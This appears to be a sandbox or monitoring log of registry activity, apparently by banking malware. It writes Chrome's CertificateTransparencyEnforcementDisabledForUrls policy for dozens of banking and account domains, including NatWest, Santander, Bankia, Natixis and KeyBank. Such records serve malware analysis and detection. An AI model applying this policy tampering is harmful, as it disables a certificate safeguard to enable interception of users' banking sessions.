Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 100, data = sellercentral.amazon.com, size = 24, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 101, data = www.simplii.com, size = 15, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 102, data = simplii.com, size = 11, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 103, data = online.simplii.com, size = 18, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 104, data = express.53.com, size = 14, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 105, data = www.key.com, size = 11, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 106, data = key.com, size = 7, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 107, data = ibx.key.com, size = 11, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 108, data = keynavigator.key.com, size = 20, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 109, data = securentrycorp.amegybank.com, size = 28, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 110, data = mblogin.verizonwireless.com, size = 27, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 111, data = www.rbsdigital.com, size = 18, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 112, data = rbsdigital.com, size = 14, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 113, data = www.nwolb.com, size = 13, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 114, data = nwolb.com, size = 9, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 115, data = retail.santander.co.uk, size = 22, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 116, data = online.bankofscotland.co.uk, size = 27, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 117, data = ebanking.es.rbcis.com, size = 21, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 118, data = www.volkswagenbank.es, size = 21, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 119, data = volkswagenbank.es, size = 17, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 120, data = clientes.selfbank.es, size = 20, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 121, data = bancoonline.openbank.es, size = 23, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 122, data = id.oney.es, size = 10, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 123, data = clientes.uci.es, size = 15, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 124, data = www.bankia.es, size = 13, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 125, data = bankia.es, size = 9, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 126, data = www2.targobank.es, size = 17, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 127, data = www.novobanco.es, size = 16, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 128, data = novobanco.es, size = 12, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 129, data = www2.popularbancaprivada.es, size = 27, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 130, data = conecta.es.rbcis.com, size = 20, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 131, data = nbnet.novobanco.es, size = 18, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 132, data = newentreprises.interepargne.natixis.com, size = 39, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 133, data = cib.natixis.com, size = 15, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 134, data = epargnants.interepargne.natixis.fr, size = 34, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 135, data = bancaelectronica.evobanco.com, size = 29, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 136, data = be.abanca.com, size = 13, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 137, data = mylo.lombardodier.com, size = 21, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 138, data = cs1.credistar.com, size = 17, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 139, data = www.eurocredito.es, size = 18, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 140, data = eurocredito.es, size = 14, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 141, data = entreprises.retraite.assurances.natixis.com, size = 43, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 142, data = caixadirecta.colonya.es, size = 23, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 143, data = bancaporinternet.bancocaixageral.es, size = 35, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 144, data = barclaysnet.barclays.es, size = 23, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 145, data = www.bsfincomonline.com, size = 22, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 146, data = bsfincomonline.com, size = 18, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 147, data = bsi.ar-ent.net, size = 14, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 148, data = www.carife.it, size = 13, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 149, data = carife.it, size = 9, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 150, data = www.bancacrasti.it, size = 18, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 151, data = bancacrasti.it, size = 14, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 152, data = www.biverbanca.it, size = 17, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 153, data = biverbanca.it, size = 13, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 154, data = app.secservizi.it, size = 17, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 155, data = bebank.bpel.net, size = 15, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 156, data = ibbweb.tecmarket.it, size = 19, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 157, data = tesoreriaonline.bper.it, size = 23, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
